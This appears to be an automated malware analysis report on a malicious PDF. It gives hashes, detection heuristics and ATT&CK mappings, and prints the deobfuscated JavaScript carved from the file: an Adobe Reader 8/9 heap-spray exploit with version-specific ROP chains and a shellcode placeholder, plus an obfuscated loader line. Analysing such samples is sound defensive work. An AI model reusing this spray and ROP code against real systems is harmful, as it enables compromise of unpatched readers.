Malicious PDF — malware analysis report

Static analysis result for SHA-256 4d29626e4e2f1241…

MALICIOUS

PDF

5.7 KB Created: 2009-05-05 21:16:20 Authoring application: aaa (via vvvv) First seen: 2026-05-11
MD5: e3b0503f57a273759193b1f8704fe399 SHA-1: 3f57d28ac54e61c3578384dc9d347b194961c836 SHA-256: 4d29626e4e2f1241a1b0bd9c37f8b3cddd991a3baf734474e3950cec8c7da51d
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF document contains embedded JavaScript, flagged by multiple heuristics including ML_NYX_PDF_MALICIOUS. The deobfuscated JavaScript, named 'acroform_b64_00.js', is likely responsible for executing the malicious payload. The presence of JavaScript actions and embedded JS streams strongly indicates an exploit attempt within the PDF.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var gxSLcpOPsRKf='jYtmfcNu';try{gxSLcpOPsRKf="app.alert";throw new Error\('mHcNaHMZm'\);app.alert\('otCnkBGDo'\);}catch\(Error\){gxSLcpOPsRKf='eval'};function MRCnMlSj\(str\){var YZOfsBunY='qXAhSfwJ';try{throw new Error\('vIpmDUFeT'\);}catch\(Error\){var YZOfsBunY="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";}var UFavIhu="";var Xol="";for\(var i=0;i<str.length;i++\){UFavIhu+=chKDA\(\(6-YZOfsBunY.indexOf\(str.substr\(i,1\)\).toString\(2\).length\)\)+YZOfsBunY.indexOf\(str.su …
    endstream
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
acroform_b64_00.js deobfuscated-js PDF AcroForm base64 (raw) at offset 0x5C4 2803 bytes
SHA-256: 2dcc302789541914f37753c067c2c4ea2237a5b048127e1f3f24d5698bb1be31
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Helper used by the spray below: returns `what` concatenated `count` times.
// The pre-decrement loop runs exactly `count` iterations; count <= 0 yields "".
function repeat(count,what) {var v = "";while (--count >= 0) v += what;return v;}

// Viewer version from the Acrobat/Reader JavaScript API; the version checks
// further down use it to pick a version-specific payload (only 8.x and 9.x
// are handled).
var ver = app.viewerVersion;
// Shellcode stage. The literal here is the bare word "SHELLCODE" — either a
// placeholder left in the sample or a redaction by the carving tool; which one
// cannot be told from this preview.
var sc = unescape("SHELLCODE");

// Heap spray. Fills the implicit global `mem` with `count` large strings, each
// made of the short filler `nop_slide` repeated many times followed by `sc`
// (the callers pass ROP chain + shellcode as `sc`). Allocating thousands of
// near-identical multi-KB strings is what places the payload at predictable
// heap addresses. The filler values the callers use (e.g. %u12c4%u4a80) lie in
// the same 0x4a8xxxxx range as the ROP words, so this looks like an address
// slide rather than an x86 NOP sled — inferred from the values only.
// Detection note: this allocate-in-a-loop pattern, together with the unescape()
// calls, is what the PDF_JS_EXPLOIT_CLUSTER heuristic above keys on.
function spray_func(sc,nop_slide,count){
	var sz = 1024;
	// Filler repeated (1024*15 - sc.length/2) times, then the payload.
	var spray = repeat(nop_slide,1024*15-(sc.length/2))+sc;
	// The first array entry gets a slightly shorter leading filler than the rest.
	var FirstEntry = repeat(nop_slide,sz-18);
	var OtherEntry = repeat(nop_slide,sz-11);
	// `mem` and `i` are assigned without `var`, so both become globals;
	// presumably `mem` is kept global so the sprayed strings stay reachable.
	mem=new Array();
	for(i=0;i<count;i++){
		if(i==0){
			mem[i]=FirstEntry+spray;
		}else{
			mem[i] = OtherEntry+spray;
		}
	}
} 

// Version dispatch: no action for Reader < 8 or >= 10. Reader 8.x and 9.x each
// get their own ROP chain, encoded as %u-escaped 16-bit words (each pair is one
// little-endian 32-bit value, e.g. %u12c4%u4a80 -> 0x4a8012c4), prepended to the
// shellcode, plus a matching 4-byte filler and a 2000-entry spray. `rop8`,
// `nop_slide8`, `rop9` and `nop_slide9` are implicit globals (no `var`). The
// page jump after each spray presumably navigates to the page holding the
// triggering object — that object is not part of this preview. Branching on
// app.viewerVersion plus unescape("%u...") blobs is a strong static indicator
// for a Reader exploit kit even before the chains are decoded.
if(ver<8){}
else if(ver<9){
	rop8=unescape("%u17f2%u4a82%u5000%u4a84%u630f%u4a80%u7ec9%u4a81%u203c%u4a82%u57bc%u4a80%u156a%u4a82%u54e0%u4a82%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0008%u0000%u597d%u4a80%u7ec9%u4a81%u2038%u4a82%u57bc%u4a80%u156a%u4a82%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0008%u0000%u597d%u4a80%u7ec9%u4a81%u2030%u4a82%u57bc%u4a80%u156a%u4a82%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u17f2%u4a82%u5004%u4a84%u630f%u4a80%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0030%u0000%u597d%u4a80%u7ec9%u4a81%u5004%u4a84%ua649%u4a81%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0020%u0000%u597d%u4a80%u17f2%u4a82%u156a%u4a82%u00a0%u4a82%u7ec9%u4a81%u0034%u0000%u795a%u4a80%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u000a%u0000%u597d%u4a80%u7ec9%u4a81%u2140%u4a82%u57bc%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%u258b%u5000%u4a84%u4d4d");
	nop_slide8 = unescape("%u12c4%u4a80");
	spray_func(rop8 + sc,nop_slide8,2000);
	this.pageNum = 2;
}else if(ver<10){
	rop9=unescape("%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%u258b%u0000%u4a8a%u4d4d");
	nop_slide9 = unescape("%u1064%u4a80");
	spray_func(rop9+sc,nop_slide9,2000);this.pageNum = 3;
}